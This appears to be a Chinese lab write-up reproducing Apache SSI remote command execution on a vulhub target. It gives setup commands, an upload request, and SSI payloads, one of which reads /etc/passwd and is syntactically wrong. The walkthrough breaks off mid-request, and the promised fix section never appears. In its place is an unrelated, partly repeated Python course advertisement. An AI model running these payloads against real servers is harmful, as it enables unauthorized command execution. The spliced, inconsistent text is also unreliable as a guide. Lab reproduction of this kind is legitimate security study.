- 修复建议
文末 “修复建议” 有 SSI 配置解读
SSI简介:
漏洞复现之前,要知道SSI是什么,那么SSI是什么呢?
SSI----即server-side includes
SSI功能:
SSI提供了一种对现有HTML文档增加动态内容的方法,不需要编写复杂的JSP/PHP/ASP等程序或者调用CGI程序。
SSI用法:
SSI的语法格式类似HTML的注释,因此正确启用SSI之后,浏览器可以忽略他但是源码仍然可见,服务器会对特定的SSI指令解析,从而实现少量动态内容的添加。
文末 “修复建议” 有 SSI 配置解读
影响版本
同样是因为配置不当的原因造成的。
漏洞原理
当目标服务端存在不允许上传php后缀的文件时,但是同时又开启了SSI与CGI支持,攻击者就可以上传一个shtml文件,并利用 语法执行任意命令。因为 SSI 支持从 HTML 的注释行中读取命令并执行,所以当 HTML 注释行中存在恶意的代码时,就会造成远程命令执行。
例如:
<!--#echo var="cat /etc/passwd" -->
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp)
启动 Apache SSI 远程命令执行漏洞 环境
1.进入 vulhub 的 ssi-rce 路径
cd /usr/local/tools/vulhub/httpd/ssi-rce
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep ssi-rce
漏洞利用
访问 8080 端口
上传一个 php 后缀文件,报错
此时,我们就可以利用 SSI 的特性,上传一个 “.shtml” 文件,内容为 <!--#exec cmd="date" -->,此处的 “date” 可以自己任意改。
数据包内容如下
POST /upload.php HTTP/1.1
Host: 139.196.87.102:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数Python工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Python开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注Python)
9f49b566129f47b8a67243c1008edf79.png)
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注Python)
扫一扫
240
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
